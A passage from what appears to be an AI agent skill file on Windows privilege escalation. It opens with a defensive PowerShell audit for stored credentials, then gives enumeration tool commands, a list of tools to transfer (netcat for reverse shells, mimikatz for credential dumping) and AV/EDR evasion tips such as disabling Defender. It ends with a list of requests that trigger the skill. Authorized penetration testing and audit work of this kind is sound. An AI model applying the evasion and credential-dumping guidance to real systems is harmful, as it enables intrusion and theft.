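A defender's sweep for the credential leftovers that the "Search for Passwords" and GPP sections harvest, as an added example that is not part of the original skill. It checks unattend/sysprep answer files, PSReadLine history files, the IIS configuration files named above, Winlogon auto-logon values, and GPP XML files in SYSVOL that still carry a cpassword attribute. It reports locations only and never decrypts or prints a secret, so the output can be handed to the owning team. Assumptions: the SYSVOL path is derived from $env:USERDNSDOMAIN and is only checked on a domain-joined host, and the file lists are the well-known locations, not an exhaustive set. Windows PowerShell 5.1 or later, elevated.

```powershell
# Added cleanup audit, not part of the original skill. Lists files and registry values on
# this host (and in SYSVOL, when domain-joined) that commonly hold clear-text or
# reversibly encrypted credentials. Reports locations only. Run elevated in Windows
# PowerShell 5.1+. Assumption: $SysvolRoot is built from $env:USERDNSDOMAIN.

function New-Hit($Type, $Location, $ContainsSecret, $Fix) {
    [pscustomobject]@{ Type = $Type; Location = $Location; ContainsSecret = [bool]$ContainsSecret; Fix = $Fix }
}

function Find-UnattendFiles {
    $candidates = 'C:\Windows\Panther\Unattend.xml', 'C:\Windows\Panther\Unattended.xml',
                  'C:\Windows\Panther\Unattend\Unattend.xml', 'C:\Windows\System32\Sysprep\Unattend.xml',
                  'C:\Windows\System32\Sysprep\sysprep.xml', 'C:\unattend.xml', 'C:\sysprep.inf'
    foreach ($f in ($candidates | Where-Object { Test-Path -LiteralPath $_ })) {
        $hasPw = Select-String -LiteralPath $f -Pattern '<Password>|<PlainText>true|AdministratorPassword' -Quiet
        New-Hit 'UnattendFile' $f $hasPw 'Delete after imaging, or strip the <Password> elements'
    }
}

function Find-PSReadLineHistory {
    $glob = 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    foreach ($h in (Get-ChildItem -Path $glob -ErrorAction SilentlyContinue)) {
        $hits = @(Select-String -LiteralPath $h.FullName -Pattern 'password|ConvertTo-SecureString|-Credential').Count
        New-Hit 'PSReadLineHistory' $h.FullName ($hits -gt 0) 'Review and clear; for service accounts set Set-PSReadLineOption -HistorySaveStyle SaveNothing'
    }
}

function Find-IisConfigSecrets {
    $files = 'C:\inetpub\wwwroot\web.config', 'C:\Windows\System32\inetsrv\config\applicationHost.config'
    foreach ($f in ($files | Where-Object { Test-Path -LiteralPath $_ })) {
        $hasPw = Select-String -LiteralPath $f -Pattern 'password=' -Quiet
        New-Hit 'IISConfig' $f $hasPw 'Encrypt the section (aspnet_regiis -pe) or move the secret out of the file'
    }
}

function Find-WinlogonAutoLogon {
    $wl = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    if ($wl.DefaultPassword -or $wl.AutoAdminLogon -eq '1') {
        New-Hit 'WinlogonAutoLogon' "Winlogon\DefaultUserName=$($wl.DefaultUserName)" $wl.DefaultPassword `
            'Remove DefaultPassword; if auto-logon is required, Sysinternals Autologon stores it as an LSA secret instead'
    }
}

function Find-GppCpassword {
    if (-not $env:USERDNSDOMAIN) { return }
    $SysvolRoot = "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies"
    if (-not (Test-Path -Path $SysvolRoot)) { return }
    $gppFiles = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Drives.xml', 'Printers.xml'
    Get-ChildItem -Path $SysvolRoot -Recurse -Include $gppFiles -ErrorAction SilentlyContinue | ForEach-Object {
        # A non-empty cpassword is always recoverable: the AES key is published (MS14-025 / KB2962486).
        if (Select-String -LiteralPath $_.FullName -Pattern 'cpassword="[^"]+"' -Quiet) {
            New-Hit 'GPP-cpassword' $_.FullName $true 'Delete the preference item and rotate the account password'
        }
    }
}

@(Find-UnattendFiles) + @(Find-PSReadLineHistory) + @(Find-IisConfigSecrets) +
@(Find-WinlogonAutoLogon) + @(Find-GppCpassword) |
    Format-Table Type, Location, ContainsSecret, Fix -AutoSize -Wrap
```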

Automated Enumeration Tools

WinPEAS:

# Download and run
winPEASx64.exe
winPEASx64.exe quiet
winPEASx64.exe systeminfo

PowerUp (PowerSploit):

Import-Module .\PowerUp.ps1
Invoke-AllChecks

Seatbelt:

Seatbelt.exe -group=all
Seatbelt.exe -group=system
Seatbelt.exe -group=user

SharpUp:

SharpUp.exe audit

PrivescCheck:

Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck
Invoke-PrivescCheck -Extended

Tools to Transfer

Essential Binaries:

  • winPEAS.exe - Automated enumeration
  • nc.exe - Netcat for reverse shells
  • accesschk.exe - Check permissions
  • PsExec.exe - Execute as different user
  • procdump.exe - Dump process memory
  • mimikatz.exe - Credential dumping
  • Rubeus.exe - Kerberos attacks
  • PrintSpoofer.exe - Token impersonation
  • GodPotato.exe - Token impersonation (latest)

PowerShell Modules:

  • PowerUp.ps1 - Privilege escalation checks
  • PowerView.ps1 - AD enumeration
  • Invoke-Mimikatz.ps1 - Memory credential dumping
  • PrivescCheck.ps1 - Detailed enumeration

Troubleshooting

Exploit Not Working:

  • Verify Windows version matches exploit requirements
  • Check architecture (x86 vs x64)
  • Confirm the patch the exploit depends on is actually absent (compare against wmic qfe output)
  • Check for AV/EDR blocking execution
  • Try different exploit variant

Access Denied:

  • Check file/registry permissions with icacls
  • Verify user privileges with whoami /priv
  • Ensure UAC is not blocking (run as administrator)
  • Check if action requires SYSTEM level

AV/EDR Bypass:

  • Obfuscate payloads and scripts
  • Use in-memory execution
  • Disable Windows Defender (if admin)
  • Use living-off-the-land binaries (LOLBins)

When to Use This Skill

Activate this skill when the user asks to:

  • Escalate privileges on Windows systems
  • Enumerate Windows privilege escalation vectors
  • Exploit Windows service misconfigurations
  • Perform token manipulation attacks
  • Bypass UAC
  • Dump Windows credentials
  • Analyze Windows security misconfigurations
  • Help with Windows penetration testing

Always ensure proper authorization before performing privilege escalation on any system.